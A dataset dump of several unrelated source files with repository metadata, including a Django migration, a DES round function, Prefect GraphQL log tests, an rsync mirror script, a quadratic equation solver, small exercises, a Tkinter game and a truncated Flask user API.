            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('type_name', models.CharField(max_length=30)),
                ('unit', models.CharField(max_length=50)),
                ('rate', models.DecimalField(decimal_places=2, max_digits=7)),
                ('description', models.TextField()),
            ],
        ),
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('type_id', models.IntegerField()),
                ('user_name', models.CharField(max_length=15)),
                ('head_pic', models.CharField(max_length=100)),
                ('phone', models.CharField(max_length=50, unique=True)),
                ('is_left', models.BooleanField()),
            ],
        ),
        migrations.CreateModel(
            name='UserType',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('type_name', models.CharField(max_length=30)),
                ('description', models.CharField(max_length=300)),
            ],
        ),
    ]
| [
"sz66cm@163.com"
] | sz66cm@163.com |
159b6bf20963afd927a24e9c72ab4a79942ea609 | 17f72515f96fba80a00230132c69cd4f2809c58d | /sample.py | 3571450a04c11f8107aecd6b2373fe7f8365be3b | [] | no_license | asha952/tutorialtweetgen | daa6ac794d472167a4cd24b6c8eaf0606196a7a2 | 05f098696c0c0fe116e82b0ef614e9363a2b1df8 | refs/heads/master | 2020-12-19T08:47:50.432253 | 2020-03-06T05:22:03 | 2020-03-06T05:22:03 | 235,686,364 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 649 | py | import random
from word_frequency import histogram
def dict_sample(histogram):
    """Return one key of *histogram*, chosen with probability proportional
    to its count (weighted random sampling).

    Bug fixes vs. the original:
    * the ``histogram`` parameter was shadowed by ``histogram = {}`` and the
      function silently read the module-global ``hist`` instead;
    * the cumulative-probability walk has been tightened so a key is always
      returned for a non-empty histogram.

    Returns None for an empty (or all-zero) histogram.
    """
    total = sum(histogram.values())
    if total == 0:
        return None
    dart = random.random()  # uniform in [0, 1)
    cumulative = 0.0
    key = None
    for key, count in histogram.items():
        cumulative += count / total
        if dart < cumulative:
            return key
    # Float rounding can leave `dart` a hair past the final bin; the last
    # key is the correct choice in that case.
    return key
if __name__ == "__main__":
    # Demo driver: build a word-frequency histogram from words.txt and
    # print one weighted random sample.
    filename = 'words.txt'
    word_histogram = {}  # NOTE(review): unused — confirm it can be dropped
    with open(filename, 'r') as f:
        words = f.read().split(' ')
    hist = histogram(words)
    print(dict_sample(hist))
| [
"ashabsiddiqui952@gmail.com"
] | ashabsiddiqui952@gmail.com |
691aa804118899e915ea14af3accf1e1eaf3af76 | 1006a954e2fb0eb20e20bd4702c923d886fec852 | /7DES/utils_prodtrans.py | e5f08ba3339ed2efb982954ef20bfd136de69368 | [] | no_license | ujn7843/Crytography_Assignment | b4eeecdb13e6c0bc1898dc5401cafcbeb7422b98 | 9a2ddda30b15fcc6f91499ce88ec5ad41255ba8a | refs/heads/master | 2022-03-21T07:46:50.563055 | 2019-12-25T00:09:06 | 2019-12-25T00:09:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 574 | py | from utils_key import *
def ProductTrans(L0, R0, i):
    '''
    One DES-style Feistel round (product transformation).

    Arguments:
        L0: left half of the round input (output of round i-1)
        R0: right half of the round input (output of round i-1)
        i: round number, used to derive the round key
    Returns:
        Li: left half of this round's output (= old right half)
        Ri: right half of this round's output (= f(R0, K_i) XOR L0)
    '''
    R1 = Expansion(R0)           # expansion permutation E (32 -> 48 bits)
    key = GenerateKey(i)         # derive round key for round i
    R2 = xor(R1, key)            # mix expanded half with the round key
    R3 = Sbox(R2, S_box)         # S-box substitution/compression (48 -> 32 bits)
    R4 = ReplaceFunc(R3, P_box)  # permutation P
    R5 = xor(R4, L0)             # combine with the previous left half
    # NOTE(review): reshape((8, 4)) assumes L0/R0 are numpy bit arrays of
    # 32 elements — confirm against utils_key's representation.
    Ri = R5.reshape((8, 4))
    Li = R0.reshape((8, 4))
    return Li, Ri
"noreply@github.com"
] | ujn7843.noreply@github.com |
72331551bdcfaaed464d0a85970737b617219850 | 8c2d923f54e98e79e40dada15252fe0fd03d0d7b | /server/tests/graphql/test_logs.py | a2446cc813f4719773699253c95c275fc32ffc0f | [
"LicenseRef-scancode-proprietary-license",
"Apache-2.0"
] | permissive | manesioz/prefect | 0069583f2b248661e8eb38ae104930551b09eedc | f2ae050df8258aebfc0a97ffcd3e38344180f53e | refs/heads/master | 2021-03-06T04:55:53.000101 | 2020-06-22T19:39:41 | 2020-06-22T19:39:41 | 246,180,294 | 0 | 0 | Apache-2.0 | 2020-06-22T19:39:42 | 2020-03-10T01:31:40 | null | UTF-8 | Python | false | false | 5,391 | py | # Licensed under the Prefect Community License, available at
# https://www.prefect.io/legal/prefect-community-license
import asyncio
import pendulum
import pytest
from prefect_server.database import models
class TestWriteRunLogs:
    """Integration tests for the `write_run_logs` GraphQL mutation.

    Each test issues the mutation through the `run_query` fixture and then
    reads the persisted rows back via `models.Log`. Log writes are
    asynchronous, hence the short sleeps before querying.
    """

    # Shared GraphQL document used by every test in this class.
    mutation = """
        mutation($input: write_run_logs_input!) {
            write_run_logs(input: $input) {
                success
            }
        }
    """

    async def test_create_flow_run_logs(self, run_query, flow_run_id):
        # Flow-level logs only: task_run_id should remain NULL.
        logs = [dict(flow_run_id=flow_run_id, message="test") for _ in range(10)]
        result = await run_query(
            query=self.mutation, variables=dict(input=dict(logs=logs)),
        )
        assert result.data.write_run_logs.success
        await asyncio.sleep(0.5)  # logs are persisted asynchronously
        logs = await models.Log.where({"flow_run_id": {"_eq": flow_run_id}}).get(
            {"message", "task_run_id"}
        )
        assert len(logs) == 10
        assert all(log.message == "test" for log in logs)
        assert all(log.task_run_id is None for log in logs)

    async def test_create_task_run_logs(self, run_query, flow_run_id, task_run_id):
        # Logs attached to a specific task run are retrievable by task_run_id.
        logs = [
            dict(flow_run_id=flow_run_id, task_run_id=task_run_id, message="test")
            for _ in range(14)
        ]
        result = await run_query(
            query=self.mutation, variables=dict(input=dict(logs=logs)),
        )
        assert result.data.write_run_logs.success
        await asyncio.sleep(0.5)
        logs = await models.Log.where({"task_run_id": {"_eq": task_run_id}}).get(
            {"message"}
        )
        assert len(logs) == 14
        assert all(log.message == "test" for log in logs)

    async def test_create_logs_with_options(self, run_query, flow_run_id):
        # All optional fields (level, name, info, timestamp) round-trip intact.
        level = "CRITICAL"
        name = "test-logger"
        timestamp = pendulum.datetime(2019, 1, 1, 1, 1, 1)
        info = {"a": [1, 2, 3]}
        payload = dict(
            flow_run_id=flow_run_id,
            message="test",
            level=level,
            name=name,
            info=info,
            timestamp=timestamp.isoformat(),
        )
        logs = [payload for _ in range(6)]
        result = await run_query(
            query=self.mutation, variables=dict(input=dict(logs=logs)),
        )
        assert result.data.write_run_logs.success
        await asyncio.sleep(0.5)
        logs = await models.Log.where({"flow_run_id": {"_eq": flow_run_id}}).get(
            {"message", "info", "timestamp", "name", "level"}
        )
        assert len(logs) == 6
        assert all(log.message == "test" for log in logs)
        assert all(log.info == info for log in logs)
        assert all(log.timestamp == timestamp for log in logs)
        assert all(log.name == name for log in logs)
        assert all(log.level == level for log in logs)

    async def test_create_logs_with_invalid_level_fails(self, run_query, flow_run_id):
        # The level argument is an enum: invalid values are rejected by
        # GraphQL validation before anything is written.
        result = await run_query(
            query=self.mutation,
            variables=dict(
                input=dict(
                    logs=[
                        dict(flow_run_id=flow_run_id, message="test", level="bad-level")
                    ]
                )
            ),
        )
        assert "got invalid value 'bad-level'" in result.errors[0].message

    async def test_diverse_payloads(self, run_query, flow_run_id):
        # Heterogeneous batch: every log keeps its own field values.
        levels = ["ERROR", "CRITICAL", "INFO", "INFO"]
        names = ["test-logger", "foo", "bar", "chris"]
        timestamps = [
            pendulum.datetime(2019, i + 1, 1, 1, 1, 1).isoformat() for i in range(4)
        ]
        infos = [{let: list(range(i + 1))} for i, let in enumerate("abcd")]
        messages = ["do", "rae", "me", "fa"]
        payloads = [
            dict(
                flow_run_id=flow_run_id,
                message=messages[i],
                level=levels[i],
                name=names[i],
                info=infos[i],
                timestamp=timestamps[i],
            )
            for i in range(4)
        ]
        await run_query(
            query=self.mutation, variables=dict(input=dict(logs=payloads)),
        )
        await asyncio.sleep(0.5)
        logs = await models.Log.where({"flow_run_id": {"_eq": flow_run_id}}).get(
            {"message", "info", "timestamp", "name", "level"}
        )
        assert len(logs) == 4
        assert set([log.message for log in logs]) == set(messages)
        assert set([log.level for log in logs]) == set(levels)
        assert set([log.name for log in logs]) == set(names)
        assert set([log.timestamp.isoformat() for log in logs]) == set(timestamps)
        stored_infos = [log.info for log in logs]
        assert all(info in stored_infos for info in infos)

    async def test_create_flow_run_logs_requires_flow_run_id_for_all_logs(
        self, run_query, flow_run_id
    ):
        # A null flow_run_id anywhere in the batch fails validation and the
        # whole batch is rejected (log count unchanged).
        logs_count = await models.Log.where().count()
        logs = [dict(flow_run_id=flow_run_id, message="test") for _ in range(9)]
        logs.append(dict(flow_run_id=None, message="test"))
        result = await run_query(
            query=self.mutation, variables=dict(input=dict(logs=logs)),
        )
        assert result.errors
        assert "Expected non-nullable type UUID!" in result.errors[0].message
        await asyncio.sleep(0.5)
        new_count = await models.Log.where().count()
        assert new_count == logs_count
| [
"noreply@github.com"
] | manesioz.noreply@github.com |
1673869e25c4e792d07a567dfdf2bb620603032d | e3c2844608c8776ff0346db719500a4a9aa0aabb | /test.py | 35a6fd7ff4612e8c82b96d49dca59c1fe8effdce | [] | no_license | z0by/mirror-scripts | f2c8d1fb1639166fabbf917306bf2e0338eca98f | 78ecac06862e5d43231680508e932278bd488ffe | refs/heads/master | 2016-08-08T18:52:32.921736 | 2016-02-20T08:51:37 | 2016-02-24T10:29:52 | 52,144,681 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,445 | py | #!/usr/bin/env python
import os
import sys
import yaml
import logging
import subprocess
def run_cmd(cmdline, stdout=False, stderr=False, stdin=False, shell=False):
    """Run *cmdline* via subprocess.Popen and wait for completion.

    stdout/stderr/stdin are forwarded to Popen unchanged (pass
    subprocess.PIPE to capture a stream; the historical ``False`` defaults
    are kept for backward compatibility).

    Returns ``(out, err, returncode)``.
    Raises RuntimeError when the command exits non-zero.
    """
    p = subprocess.Popen(cmdline, stdout=stdout, stderr=stderr, stdin=stdin,
                         shell=shell)
    out, err = p.communicate()
    if p.returncode != 0:
        # Bug fix: report the *captured* output, not the stream arguments
        # (the original interpolated the `stdout`/`stderr` parameters).
        raise RuntimeError(
            "{0} failed, status code {1} stdout {2} stderr {3}".format(
                cmdline, p.returncode, out, err)
        )
    return out, err, p.returncode
def via_rsync(srcpath, destpath, exclude=None, latest=None):
    """Mirror *srcpath* to *destpath* with rsync.

    exclude: optional whitespace-separated string of ready-made rsync
             options (e.g. "--exclude=*.conf --exclude=testing").
    latest:  optional path used as --link-dest so unchanged files are
             hard-linked against a previous snapshot; created if missing.
    """
    rsync_cmd = [
        "rsync", '--verbose', '--archive', "--delete", "--numeric-ids",
        "--acls", "--xattrs", "--sparse", "--no-owner", "--no-group",
    ]
    if latest:
        if not os.path.exists(latest):
            os.makedirs(latest)
        rsync_cmd.append("--link-dest={}".format(latest))
    if exclude:
        # Each whitespace-separated token is already a full rsync option.
        exclude = exclude.split()
        for ex in exclude:
            rsync_cmd.append(ex)
    rsync_cmd.append(srcpath)
    rsync_cmd.append(destpath)
    run_cmd(rsync_cmd)
def load_config(conf_file):
with open(conf_file, 'r') as f:
try:
data = yaml.load(f)
return data
except yaml.parser.ParserError:
print "Invalid Compose Yaml file!"
raise
def parse_options(args):
    """Build the CLI parser and parse *args* into an options namespace."""
    import argparse

    cli = argparse.ArgumentParser()
    cli.add_argument('-v', '--version', action='version', version='0.1')
    cli.add_argument(
        '--debug',
        action='store_true',
        default=False,
        help='enable debug mode',
    )
    return cli.parse_args(args)
def main(args):
    """Entry point: parse CLI options and configure logging.

    Bug fixes vs. the original:
    * ``import logging`` does not import the ``logging.handlers``
      submodule, so the syslog branch raised AttributeError;
    * the final debug line read ``options.source`` / ``options.mountpoint``,
      which ``parse_options`` never defines, and always crashed.
    """
    import logging.handlers  # plain `import logging` does not pull in .handlers

    options = parse_options(args)
    if options.debug:
        logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)
        logging.getLogger().addHandler(logging.handlers.SysLogHandler())
    logging.debug("options: %s", vars(options))
if __name__ == '__main__':
    # main(sys.argv[1:])
    # Ad-hoc smoke test: load the config, then run the local helper script.
    data = load_config('config.yaml')  # NOTE(review): result unused — confirm
    srcpath = "/home/uladzimir/Work/mirrors/test"
    destpath = "/media/mirrors/mirrors/files"
    exclude = "--exclude=*.conf --exclude=ppc* --exclude=4* --exclude=5* --exclude=7* --exclude=testing"
    latest = "/media/mirrors/mirrors/files/latest-test"
    #via_rsync(srcpath, destpath, exclude, latest)
    run_cmd(["./test.sh"])
"uniakhai@mirantis.com"
] | uniakhai@mirantis.com |
de8719da1cba865e5be9cf02e409206fec0dc5f8 | aa4741b2b503b19612f7101412ba9ae8717f4547 | /weather_app/the_weather/the_weather/wsgi.py | 7b0c3aa9cd1f75739a957c1193d1ebaf68cb96bd | [] | no_license | igor-QA/WeatherApp | da336140efa076ed952cb30d4cffb9219292b022 | 055fc2474ca7bb1d794dad8687ee7e962479831c | refs/heads/master | 2022-11-08T05:52:45.239660 | 2020-06-26T16:37:45 | 2020-06-26T16:37:45 | 275,146,143 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 172 | py | import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings before building the WSGI app.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "the_weather.settings")

# WSGI callable used by application servers (gunicorn, mod_wsgi, ...).
application = get_wsgi_application()
| [
"igortvk@ya.ru"
] | igortvk@ya.ru |
ae36976672c1d15131b749192948515de6c6f94d | bdc255daa00a691dcd4107a9cab76525623e998e | /computor.py | 5383f487dc8bed60145d31308de29d090430f314 | [] | no_license | dishults/computorv1 | 739d47028172f5923b7a4b536d0af03bf9059dbf | e81d333a2f9b79214e0d5fdaec29b3d49a3079cc | refs/heads/main | 2023-01-02T14:40:20.335876 | 2020-10-27T11:53:01 | 2020-10-27T11:53:01 | 301,402,572 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,327 | py | #!/usr/bin/python3
import sys
class Polynomial:
    """One term of a polynomial, plus class-level state for the whole
    reduced equation.

    Class attributes:
        all_terms: maps exponent -> Polynomial term of the reduced form
        degree:    degree of the reduced polynomial (set by print_degree)
    """

    all_terms = {}
    degree = 0

    def __init__(self, sign, coefficient, variable, exponent, inverse=False):
        """Example -- '+', '5', 'X', '0'"""
        try:
            self.coefficient = float(sign + coefficient)
        except:
            # Fall back when sign+coefficient is not parseable as one float.
            self.coefficient = float(coefficient)
        self.variable = variable
        self.exponent = int(exponent)
        if inverse:
            # Terms moved from the right-hand side flip sign.
            self.coefficient *= -1

    def __str__(self):
        # Render "5 * X^2" style; drop a trailing .0 on whole numbers.
        num = abs(self.coefficient)
        if num % 1 == 0:
            num = int(num)
        return f"{num} * {self.variable}^{self.exponent}"

    @classmethod
    def get_terms(cls, equation):
        """Parse "a * X^p + ... = ..." and accumulate reduced terms."""
        def proceed(terms, inverse):
            # Tokens come in groups of 4: sign, coefficient, '*', 'X^p'.
            for i in range(0, len(terms), 4):
                variable, exponent = terms[i+3].split("^")
                term = Polynomial(terms[i], terms[i+1], variable, exponent, inverse=inverse)
                if term.exponent in cls.all_terms:
                    cls.all_terms[term.exponent].coefficient += term.coefficient
                else:
                    cls.all_terms[term.exponent] = term
        left, right = equation.split("=")
        # A leading "+" normalises the first term to the 4-token pattern.
        terms = ["+"] + left.split()
        if not (terms[1] == '0' and len(terms) == 2):
            proceed(terms, inverse=False)
        terms = ["+"] + right.split()
        if not (terms[1] == '0' and len(terms) == 2):
            proceed(terms, inverse=True)

    @classmethod
    def print_reduced_form(cls):
        """Print the reduced equation, e.g. "4 * X^0 + 4 * X^1 = 0"."""
        print("Reduced form: ", end="")
        try:
            term = cls.all_terms[0]
            if term.coefficient < 0:
                print(f"-{term}", end="")
            else:
                print(term, end="")
        except:
            pass  # no X^0 term present
        for i in range(1, len(cls.all_terms)):
            try:
                term = cls.all_terms[i]
                if term.coefficient > 0:
                    sign = " +"
                else:
                    sign = " -"
                print(sign, term, end="")
            except:
                pass  # exponent i missing from the reduced form
        print(" = 0")

    @classmethod
    def print_degree(cls):
        """Compute and print the polynomial degree (ignoring zero terms)."""
        terms = cls.all_terms
        try:
            exponents = [terms[t].exponent for t in terms.keys() if terms[t].coefficient != 0]
            cls.degree = max(exponents)
        except:
            cls.degree = 0  # every coefficient cancelled out
        print("Polynomial degree: ", cls.degree)

    @classmethod
    def solve(cls):
        """Solve Linear and Quadratic equations."""
        if cls.degree > 2:
            sys.exit("The polynomial degree is strictly greater than 2, I can't solve.")
        if cls.degree == 0:
            """n * X^0 = 0"""
            n = cls.all_terms[0].coefficient
            if n != 0:
                sys.exit("The eqution has no solution")
            print("Every real number is a solution")
        elif cls.degree == 1:
            print("b * X^0 + a * X^1 = 0")
            a = cls.all_terms[1].coefficient
            b = cls.all_terms[0].coefficient
            print("\nLinear Formula:")
            # linear_formula's docstring is shown to the user on purpose.
            print(linear_formula.__doc__)
            print("a = ", a)
            print("b = ", b)
            linear_formula(a, b)
        elif cls.degree == 2:
            print("c * X^0 + b * X^1 + a * X^2 = 0")
            a = cls.all_terms[2].coefficient
            b = cls.all_terms[1].coefficient
            c = cls.all_terms[0].coefficient
            discriminant = (b ** 2) - (4 * a * c)
            two_a = 2 * a
            print("\nQuadratic Formula:")
            print(quadratic_formula.__doc__)
            print("a = ", a)
            print("b = ", b)
            print("c = ", c)
            print("2a = ", two_a)
            print("discriminant (b^2 - 4ac) = ", discriminant)
            if discriminant == 0:
                print("\n\033[1mDiscriminant is 0\033[0m")
                # Double root: reduces to the linear case x = -b / 2a.
                print("To solve we would have to do: x = -b / 2a")
                linear_formula(two_a, b)
            else:
                if discriminant > 0:
                    print("\n\033[1mDiscriminant is strictly positive.\033[0m")
                    quadratic_formula(two_a, b, discriminant)
                else:
                    print("\n\033[1mDiscriminant is strictly negative.\033[0m",
                          "\nSo we would have to calculate complex solutions",
                          "with real and imaginary parts")
                    quadratic_formula(two_a, b, discriminant, simple=False)
def linear_formula(a, b):
    """
    x = -b / a
    """
    # NOTE: the docstring above is printed at runtime by Polynomial.solve,
    # so its text is kept verbatim. Prints the solution of a*x + b = 0.
    print("\nThe solution is:")
    if a == 0 and b == 0:
        print("Every real number is a solution")
        return
    if a == 0:
        sys.exit("The eqution has no solution")
    if b == 0:
        print(0)
        return
    print(f"\033[1m{-b / a}\033[0m")
def quadratic_formula(two_a, b, discriminant, simple=True):
    """
              -b +- sqrt(b^2 - 4ac)
        x =   —————————————————————
                       2a
    """
    # The docstring above is printed at runtime by Polynomial.solve; its
    # text is kept unchanged. `two_a` is 2a, already doubled by the caller.
    if not simple:
        # Negative discriminant: work with |discriminant| and report the
        # conjugate pair real ± imaginary*i.
        discriminant *= -1
        print(f"\n=> convert discriminant (b^2 - 4ac) to positive = {discriminant}")
        root = discriminant ** 0.5
        print("=> calculate sqrt (discriminant ** 0.5) =", root)
        re_part = -b / two_a
        print("=> calculate real part (-b / two_a) = ", re_part)
        im_part = root / two_a
        print("=> calculate imaginary part (sqrt / 2a) = ", im_part)
        print("\nThe two complex solutions are:")
        print(f"real - imaginary = \033[1m{round(re_part, 6)} - {round(im_part, 6)}i\033[0m")
        print(f"real + imaginary = \033[1m{round(re_part, 6)} + {round(im_part, 6)}i\033[0m")
        return
    # Positive discriminant: two distinct real roots.
    root = discriminant ** 0.5
    print("sqrt (discriminant ** 0.5) =", root)
    low = (-b - root) / two_a
    high = (-b + root) / two_a
    print("\nThe two solutions are:")
    print("x1 (-b - sqrt) / 2a =\033[1m", round(low, 6), "\033[0m")
    print("x2 (-b + sqrt) / 2a =\033[1m", round(high, 6), "\033[0m")
def main():
    # The program expects exactly one argument: the equation as a quoted
    # string, e.g. "5 * X^0 + 4 * X^1 - 9.3 * X^2 = 1 * X^0".
    if len(sys.argv) != 2:
        sys.exit('Usage: ./computor.py "5 * X^0 + 4 * X^1 - 9.3 * X^2 = 1 * X^0"')
    # Parse -> reduce -> report degree -> solve (degree <= 2 only).
    Polynomial.get_terms(sys.argv[1])
    Polynomial.print_reduced_form()
    Polynomial.print_degree()
    Polynomial.solve()


if __name__ == "__main__":
    main()
"me@manhattan.lan"
] | me@manhattan.lan |
f8596b927edfc2a86c973b5a9f3277105aebc388 | 7b23bf827adcee44060d0271a13b066293e96485 | /Problem Solving/Implementation/Repeated String.py | 29822a635adca6f72c93121bbf3a12151e1a9168 | [] | no_license | PinkFromTheFuture/HackerRank | 89072e085b70be0f2e445c0839454cacaed9c3c5 | 7b52a9e11093fa5935d4ec6b719fce257aa270cd | refs/heads/master | 2022-06-26T10:51:14.444711 | 2019-08-02T13:38:52 | 2019-08-02T13:38:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,020 | py | '''https://www.hackerrank.com/challenges/repeated-string/problem
'''
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the repeatedString function below.
def repeatedString(s, n):
    """Count occurrences of 'a' in the first *n* characters of the
    infinite repetition of *s*.

    O(len(s)) regardless of n: count 'a' in one full copy, multiply by
    the number of whole copies that fit in n, then add the count from
    the leftover prefix (idiomatic slice + str.count instead of the
    original manual index loop).
    """
    if not s:
        return 0  # guard: avoid division by zero on an empty pattern
    base = len(s)
    # 'a's contributed by the whole copies of s.
    count = (n // base) * s.count('a')
    # 'a's in the truncated final copy.
    count += s[:n % base].count('a')
    return count
if __name__ == '__main__':
    # HackerRank harness: read s and n from stdin, write the answer to
    # the file named by the OUTPUT_PATH environment variable.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')

    s = input()

    n = int(input())

    result = repeatedString(s, n)

    fptr.write(str(result) + '\n')

    fptr.close()
| [
"eduardoxfurtado@gmail.com"
] | eduardoxfurtado@gmail.com |
b52c0e5bdece5cc5f07c35478a9f20106d67b693 | 39daa2ec924f3d92d73d9cb59d99ddc069d0683b | /Exams/exam prep 2018-03-08/02.py | d4a3165ffff368b43740ebe70d013aed275eb70e | [
"MIT"
] | permissive | Bugzey/Softuni-Python-Fundamentals | ab2737f4393266aae096bf7f57ebfa77f0ce8a3b | 6f66e143809988398896cfc771cce1db9220df27 | refs/heads/master | 2021-03-23T06:00:41.811397 | 2020-03-15T08:46:47 | 2020-03-15T08:46:47 | 247,428,961 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,966 | py | # String commander v02
def exchange(input_list, length):
    """Rotate the list: everything after index *length* moves to the
    front and the prefix (indices 0..length) moves to the back."""
    cut = length + 1
    tail = input_list[cut:]
    head = input_list[:cut]
    return tail + head
def extreme(input_list, extreme_type, num_type):
    """Among the numbers of the requested parity ('even'/'odd'), find the
    max or min and return the index of its LAST occurrence in the
    original list. Returns 'No matches' when nothing has that parity."""
    if extreme_type == 'max':
        picker = max
    elif extreme_type == 'min':
        picker = min
    # -1 never equals n % 2 for non-negative ints, so unknown parity
    # names match nothing (same as the original).
    wanted_mod = 0 if num_type == 'even' else 1 if num_type == 'odd' else -1
    candidates = [value for value in input_list if value % 2 == wanted_mod]
    if not candidates:
        return 'No matches'
    target = picker(candidates)
    last_index = None
    for position, value in enumerate(input_list):
        if value == target:
            last_index = position
    return last_index
def side(input_list, side_type, length, num_type):
    """Return up to *length* numbers of the requested parity, taken from
    the front ('first') or from the back in reverse order ('last').

    Returns 'Invalid count' when *length* exceeds the size of the whole
    input list (the whole list, not just the filtered numbers — kept for
    behavioural compatibility)."""
    total = len(input_list)
    if num_type == 'odd':
        parity = 1
    elif num_type == 'even':
        parity = 0
    count = int(length)
    matching = [value for value in input_list if value % 2 == parity]
    if count > total:
        return 'Invalid count'
    if side_type == 'first':
        chosen = matching[:count]
    elif side_type == 'last':
        chosen = list(reversed(matching))[:count]
    return chosen
# Read the initial integer list, then process commands until "end":
#   exchange <i>        rotate the list around index i
#   max|min <parity>    print the last index of the extreme value
#   first|last <n> <parity>  print n filtered numbers from either end
user_input = input().split(' ')
user_list = list(map(int, user_input))

while True:
    user_input = input().split(' ')
    if user_input[0] == 'end':
        break
    command = user_input[0]
    args = user_input[1:]
    if command == 'exchange':
        arg = int(args[0])
        # Index must address an existing element.
        if arg + 1 > len(user_list) or arg < 0:
            print('Invalid index')
            continue
        user_list = exchange(user_list, arg)
    elif command in ['max', 'min']:
        num_type = args[0]
        result = extreme(user_list, command, num_type)
        print(result)
    elif command in ['first', 'last']:
        side_type = command
        length, num_type = args[0:2]
        length = int(length)
        result = side(user_list, side_type, length, num_type)
        print(result)

# Final state of the list after all commands.
print(user_list)
| [
"radddi@abv.bg"
] | radddi@abv.bg |
1ae1c06a4d9808347ac1b53b64efffff089681c8 | fae454e66b9280821b3364d933979303df5cadcc | /FroggerProj.py | dd7e3a21a211ee659390e31e21e046351bd3c11d | [] | no_license | johnthekid/FroggerProject | 419c244500a389617339679b788a3c0c309bca03 | 35bfd4482b45cb282824cbd38054b09245e84259 | refs/heads/master | 2021-01-18T13:29:42.233838 | 2014-12-04T21:00:21 | 2014-12-04T21:00:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,660 | py | from Tkinter import *
# Window, canvas and the three sprites: a player dot at the bottom centre
# and two enemy cars that patrol horizontally.
root = Tk()
drawpad = Canvas(root, width=800, height=600, background='gray')
player = drawpad.create_oval(390, 580, 410, 600, fill="blue")
car1 = drawpad.create_rectangle(50, 50, 100, 60, fill="red")
car2 = drawpad.create_rectangle(50, 50, 100, 60, fill="red")
direction = 5
direction = -5  # NOTE(review): immediately overwrites the 5 above — confirm intent
fast = 7  # speed of the second (faster) car
class myApp(object):
    """Frogger-style demo: two cars bounce horizontally; WASD moves the
    player dot. State (canvas, sprites, speeds) lives in module globals."""

    def __init__(self, parent):
        global drawpad
        self.myParent = parent
        self.myContainer1 = Frame(parent)
        self.myContainer1.pack()
        drawpad.pack()
        # Route every key press to self.key, then start the animation loop.
        root.bind_all('<Key>', self.key)
        self.animate()

    def animate(self):
        # Move both cars one step; reverse a car's direction when it hits
        # either canvas edge. Re-schedules itself every 5 ms via after().
        global drawpad
        global enemy  # NOTE(review): `enemy` is never defined or used — confirm removable
        global fast
        global direction
        x1, y1, x2, y2 = drawpad.coords(car1)
        px1, py1, px2, py2 = drawpad.coords(player)
        if x2 > 800:
            direction = - 5
        elif x1 < 0:
            direction = 5
        drawpad.move(car1, direction, 0)
        drawpad.after(5, self.animate)
        x1, y1, x2, y2 = drawpad.coords(car2)
        if x2 > 800:
            fast = - 7
        elif x1 < 0:
            fast = 7
        drawpad.move(car2, fast, 0)

    def key(self, event):
        # WASD movement, 4 pixels per key press.
        global drawpad
        global player
        if event.char == "w":
            drawpad.move(player, 0, -4)
        if event.char == "s":
            drawpad.move(player, 0, 4)
        if event.char == "d":
            drawpad.move(player, 4, 0)
        if event.char == "a":
            drawpad.move(player, -4, 0)

    def collisionDetect(self, player):
        # NOTE(review): incomplete — fetches the player's bounding box but
        # never compares it against the cars.
        rx1, ry1, rx2, ry2 = drawpad.coords(player)
# Build the app (starts the animation loop) and enter the Tk event loop.
app = myApp(root)
root.mainloop()
"jsan77@yahoo.com"
] | jsan77@yahoo.com |
9587ab6da0f161dabef2e8887d0ad95d233adc82 | 53d824c3b9d83382367bebb6802f98138e997465 | /square.py | 6fdcf10cbb0d7188bfa764af47af8228f03d3a0a | [] | no_license | MwasCipher/FullStack-Nanodegree | 9d34dde9d9ec56d127b2761246c326ba4db8ffa1 | 20ed4007442adcfca0bcdf67d3c6a478d29302db | refs/heads/master | 2020-08-22T09:16:05.930709 | 2019-11-15T20:33:39 | 2019-11-15T20:33:39 | 216,363,349 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | import turtle
def draw_square(brad):
for i in range(1, 5):
brad.forward(100)
brad.right(90)
def draw_art():
brad = turtle.Turtle()
brad.color('yellow')
brad.shape('turtle')
brad.speed(2)
window = turtle.Screen()
window.setup(800, 600)
window.bgcolor('red')
for i in range(1, 37):
draw_square(brad)
brad.right(10)
window.exitonclick()
draw_art()
| [
"mwangicollinswaweru@gmail.com"
] | mwangicollinswaweru@gmail.com |
df5adcdae70cdbfbaf9f966b0d9c961df085724b | d1b4d99cf0ce3f46ef844f9def5b31204be0edb6 | /app/api/v1/user.py | 5156679d21d6594f89d6eb7edeb7ccd37e14bb6c | [
"MIT"
] | permissive | xu20065953/ginger | 2d772c26cfa7046c2f9db329d7e532476916c03f | a493f9a4cef9f77a691f5fbad3e074344b7a8e50 | refs/heads/master | 2022-12-19T23:17:53.758673 | 2019-01-10T05:57:34 | 2019-01-10T05:57:34 | 161,883,753 | 0 | 0 | MIT | 2022-12-08T01:28:56 | 2018-12-15T08:04:56 | Python | UTF-8 | Python | false | false | 1,124 | py | # -*- coding: utf-8 -*-
# @Author : jjxu
# @time: 2018/12/15 16:59
from flask import jsonify, g, render_template
from app.libs.error_code import DeleteSuccess
from app.libs.redprint import Redprint
from app.libs.token_auth import auth
from app.models.base import db
from app.models.user import User
api = Redprint("user")
@api.route('/<int:uid>', methods=['GET'])
@auth.login_required
def super_get_user(uid):
    # Fetch any user by primary key; 404 if absent. Requires a valid token.
    user = User.query.filter_by(id=uid).first_or_404()
    # r = {
    #     "id": user.id,
    #     "nickname": user.nickname,
    #     "email": user.email
    # }
    return jsonify(user)
@api.route("", methods=["GET"])
@auth.login_required
def get_user():
uid = g.user.uid
user = User.query.filter_by(id=uid).first_or_404()
return jsonify(user)
# Deactivate (soft-delete) the caller's own account.
@api.route("/delete", methods=["DELETE"])
@auth.login_required
def delete_user():
    uid = g.user.uid
